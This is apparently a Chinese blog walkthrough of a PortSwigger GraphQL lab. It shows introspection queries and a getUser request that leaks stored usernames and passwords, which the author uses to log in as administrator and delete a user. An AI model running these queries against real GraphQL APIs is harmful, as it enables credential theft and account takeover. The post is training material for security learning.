通过GraphQL API未被净化的参数获取账户密码

最新推荐文章于 2024-09-07 09:01:02 发布
最新推荐文章于 2024-09-07 09:01:02 发布
阅读量1.7k 收藏
点赞数
分类专栏: 从零开始的Burp赏金猎人之路 # GraphQL API 文章标签: graphql 网络安全 web安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61812944/article/details/132419573
版权

Portswigger练兵场之GraphQL API

目录

GraphQL API-通过未被净化的参数获取账户密码

Lab: Accidental exposure of private GraphQL fields

实验前置必要知识点

寻找关于GraphQL漏洞的时候,测试查询参数是否被净化是一个很好的起点,API使用参数直接访问对象,则可能容易受到访问控制漏洞的攻击。用户可以通过提供与该信息相对应的参数来访问他们不应该拥有的信息。这有时称为不安全的直接对象引用 (IDOR)

要发现架构信息,查询__schema字段,此字段在所有查询的根类型上可用。

//例如
#Introspection probe request

{
    "query": "{__schema{queryType{name}}}"
}

实验要求

该实验室的用户管理功能由GraphQL端点提供支持。该实验室包含一个访问控制漏洞,您可以通过该漏洞诱使API泄漏用户凭据字段。

若要解决实验室问题,请以管理员身份登录并删除carlos用户名

渗透开始

  • 访问对应靶场界面
https://portswigger.net/web-security/graphql/lab-graphql-accidental-field-exposure
  • 启动靶场
1. 站点分析

这是博客类型的网站
具有查看博客功能


以及登录的功能


点点点了博客,又尝试了一下登录的端点

2. 寻找可疑功能点(查看Burp历史记录进行分析)

从总体来看,该站点使用了GraphQL进行博客查看以及登录功能


因此,分析突破口在登录功能点

3. 功能点测试

将对应的日志信息发送到重放模块


尝试修改POST请求

{"query":"\n    mutation login($input: LoginInput!) {\n        login(input: $input) {\n            token\n            success\n        }\n    }","operationName":"login","variables":{"input":{"username":"admin","password":"admin"}}}

改为查询根上内容

{
    "query": "{__schema{queryType{name}}}"
}

获得了根内容query


构造内容查询内部所有参数

{
    "query": "query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description args { ...InputValue }  } } }fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name } } } }"
}

通过这种方法查询到了所有的参数


将内容发送到可视化工具


可以看见


说明存在关于getUser的查询,在非登陆处构造对应的查询语句

{"query":"\n    query getUser($id: Int!) {\n       getUser(id: $id) {id \n username \n password }\n    }",
"variables":{"id":2}}

发现可以查看到本文章的账户以及密码


修改id查询管理员用户的密码

4.删除用户完成试验

根据账号密码登录管理员用户


找到管理面板删除用户完成实验


实验完成

5.利用InQL工具

发送到对应工具可以很直观的发现


发送到重放模块可直接拿来利用

{"query": "query {\n\tgetUser(id:1334) {\n\t\tpassword\n\t\tid\n\t\tusername\n\t}\n}"}

修复方案

禁用查看内省的功能

杳若听闻
关注
专栏目录
GraphQL API 漏洞
why811的博客
09-05 887
GraphQL 漏洞通常是由于实现和设计缺陷而出现的。例如,侦测功能可能保持活动状态,使攻击者能够查询 API 以收集有关其架构的信息。GraphQL 攻击通常采用恶意请求的形式,使攻击者能够获取数据或执行经授权的操作。这些攻击可能会产生严重影响,特别是如果用户能够通过操纵查询或执行获得管理员权限。易受攻击的 GraphQL API 也可能导致问题。在本节中,我们将介绍如何测试 GraphQL API。如果您不熟悉 GraphQL,请不要担心 - 我们将随时介绍相关细节。
渗透测试之graphQL
Sp4rkW的博客
12-03 7482
原文出处, 酒仙桥六号部队的玩转graphQL,此文只是转载用于自己mark 全文目录1、前言2、前置知识2.1、什么是GraphQL2.2、基本属性2.2、内省查询3、GraphQL中常见的问题3.1、内省查询问题3.2、信息泄露3.3、SQL注入3.4、CSRF3.5、嵌套查询拒绝服务3.6、权限问题4、总结 1、前言 在测试中我发现了很多网站开始使用GraphQL技术,并且在测试中发现了其使用过程中存在的问题,那么,到底GraphQL是什么呢?了解了GraphQL后能帮助我们在渗透测试中发现哪些问.
Apollo PersistGraphQL 使用指南
最新发布
gitblog_01099的博客
09-07 279
Apollo PersistGraphQL 使用指南 persistgraphqlA build tool for GraphQL projects.项目地址:https://gitcode.com/gh_mirrors/pe/persistgraphql 项目介绍 Apollo PersistGraphQL 是一个专注于优化 GraphQL 查询性能和安全性的工具。它通过实现持久化查询功能来减...
Hasura GraphQL Engine 存在远程命令执行漏洞
holyxp的博客
06-28 551
Hasura GraphQL Engine是Hasura开源的一个非常快速的 GraphQL 服务器。Hasura GraphQL Engine是Hasura开源的一个非常快速的 GraphQL 服务器。Hasura GraphQL Engine 存在远程命令执行漏洞。
GraphQL渗透测试详解
瓦罗兰特顶级C位的博客
01-21 1297
GraphQL 是一种查询语言,用于 API 设计和数据交互。它是由 Facebook 发布的一款新型的数据查询和操作语言,自 2012 年起在内部使用,自 2015 年起获得开源许可。
GraphQL API漏洞
实践出真理
05-30 1458
GraphQL是一种API查询语言,GraphQL服务定义了一个合约,客户端可以通过它与服务器进行通信。客户端不需要知道数据驻留在哪里。相反,客户端向GraphQL服务器发送查询,该服务器从相关位置获取数据。
shopify-api-php-sdk:用于 Shopify REST 和 GraphQL API 的 PHP SDK
05-31
处理 GraphQL Admin API for 和 。 Queryroot 用于获取资源,mutations 用于更新资源(产品/订单/客户)。 自动管理 Shopify API 速率限制。 与兼容到带有分页的资源。 安装 使用 Composer 安装包 $ composer ...
bookcover-api:用于获取书籍封面的GraphQL API
02-15
书封面API,通常被开发者用来检索图书的封面图像,为电子书平台、在线书店或个人阅读应用增添视觉吸引力。在本案例中,我们关注的是一个名为"bookcover-api"的GraphQL API,它专为获取书籍封面设计。GraphQL是一种...
graphql-api.com:GraphQL API网站的代码
03-04
GraphQL API网站 这是GraphQL API网站的仓库: ://graphql-api.com 关于此回购 此是 (基于静态站点生成器的入门工具包)的克隆。 请检出此项目以获取有关设计令牌,样式指南和其他内容的其他配置信息。 安装 克隆或...
wp-graphql:WordPress的GraphQL API
01-30
WPGraphQL是一个免费的开源WordPress插件,可为任何WordPress网站提供可扩展的GraphQL模式和API。 以下是一些帮助您入门WPGraphQL的链接 安装 需要PHP 7.1+ 需要WordPress 5.0+ 快速安装 按照WPGraphQL快速入门...
go-graphql-api-boilerplate:内置Go + graphql-go + gorm的GraphQL API样板
05-15
转到GraphQL API样板 堆栈 去 GraphQL: ORM: 特征 用户注册并登录 更改密码,个人资料 怎么跑 初始化数据库 建立资料库 postgres= # CREATE DATABASE go; 创建一个用户作为数据库所有者 postgres= # CREATE ...
gql_intruder:基于插件的 GraphQL 漏洞评估工具
05-29
GraphQL 入侵者 用于执行 GraphQL 端点漏洞评估的面向插件的工具。 用法 插件列在plugins文件夹下它们自己的文件夹中。 列出所有可用的插件: $ python3 brute.py List of available plugins Name: dump Author: Davide Barbato Description: Dump GraphQL schema via introspection. Action: dump Name: intruder Author: Davide Barbato Description: Simple bruteforce inspired by Burp Suite Intruder. Action: intruder For more info type: python3 brute.py <action> 如何编写插件
graphql-authentication::key:使使用GraphQL轻松进行无聊的身份验证工作(登录,密码重置等)成为可能。
05-02
GraphQL身份验证 免责声明:该存储库积极维护! 以前称为Prisma Auth 一个针对自以为是的用户认证包。 它使用老式的电子邮件/密码身份验证。 该软件包为您需要的所有与身份验证相关的内容提供了GraphQL模式和GraphQL解析器。 它不会访问您的数据层(例如,ORM); 为此,您需要编写一个适配器(这并不难)。 如果您使用Prisma,则已经有一个适合您的适配器 。 您也可以使用有关如何为Sequelize和TypeORM编写适配器的来检出文件夹! 特征: 使用良好的电子邮件/密码和确认电子邮件进行注册 登录 邀请其他用户(发送电子邮件) 重设密码 修改当前用户密码 更新当前用户信息 支持处理权限 动机 添加用户身份验证似乎很简单。 关于如何编写“登录”和“注册”解析器的示例很多。 您可以在自己的项目中实施它,然后继续工作。 一段时间后,您将使用户忘记他们的密
graphql-auth:Graph GraphQL身份验证和授权中间件
05-02
GraphQL身份验证 :locked: GraphQL的身份验证和授权中间件。 graphql-auth是一个非常简单的中间件,可以轻松地与遵循GraphQL API的解析器的任何GraphQL服务器集成。 入门 这个怎么运作 graphql-auth出口单一功能(中间件) withAuth 。 此函数有两个参数,第一个是授权scope (如果有的话),第二个是完成身份验证检查后要调用的callback 。 让我们看一个例子: import withAuth from 'graphql-auth' ; const resolvers = { Query : { users : withAuth ( [ 'users:view' ] , ( root , args , context ) => { ... } ) , ... } } 它的工作方式是withAuth ,它在
【漏洞挖掘】——84、Graphql安全攻防刨析
Fly_鹏程万里
06-12 107
GraphQL是一种用于构建API的查询语言和运行时环境,它提供了一种灵活且高效的方式来获取和修改数据,随着GraphQL的流行和广泛采用,我们也需要认识到与其相关的安全问题和挑战,本文将概述GraphQL安全问题并提供实用的建议和最佳实践以帮助开发人员和系统管理员确保他们的GraphQL实现在安全性方面得到充分保护,包括一些常见安全漏洞以及如何通过正确的配置和安全措施来减轻这些风险。
burp suite官方实验室/burp suite靶场之GraphQL API vulnerabilities-Accessing private GraphQL posts
a6674a的博客
09-07 381
想了解什么是 GraphQL?请访问:What is GraphQL? | Web Security AcademyGraphQL API 漏洞简介GraphQL 漏洞通常是由于实现和设计缺陷而产生的。例如,内省功能可能会保持活动状态,使攻击者能够查询 API 以收集有关其架构的信息。GraphQL 攻击通常采用恶意请求的形式,使攻击者能够获取数据或执行经授权的操作。这些攻击可能会产生严重影响,特别是如果用户能够通过操纵查询或执行CSRF 漏洞来获得管理员权限。存在漏洞的 GraphQL API 还可能导
Ibexa DXP 修复 GraphQL 密码哈希泄露漏洞
smellycat000的专栏
11-24 532
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士挪威软件公司 Ibexa 督促用户立即应用新补丁,解决影响其 Digital Experience Platform (DXP) 中的一个敏感数据泄露漏洞。DXP 是一款由电子商务、数据管理、云托管和内容管理系统 (CMS) 功能组成的B2B应用。该漏洞位于 GraphQL Bundle中。GraphQL Bundle 是Ibexa DXP 和 ...
GraphQL访问安全分析
360linker
03-25 2169
说在前面的话 本文以GraphQL中一些容易让初学者与典型Web API(为了便于理解,下文以目前流行的RESTful API为例代指)混淆或错误理解的概念特性进行内容划分,由我从安全的角度抛出GraphQL应该注意的几点安全问题,而@图南则会更多的从开发的角度给出他在实际使用过程中总结的最佳实践。 另外,需要提前声明的是,本文中我使用的后端开发语言是Go,@图南使用的是Node.js,前端统...
使用Absinthe打造GraphQL API实战指南
Chris McCord,Phoenix框架的作者,对这本书给予了高度评价,他认为这将是API开发者的一本突破性作品,通过Elixir和GraphQL的结合,可以彻底改变API的构建方式。Chad Fowler,微软和Blue Yard Capital的专家,强调...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值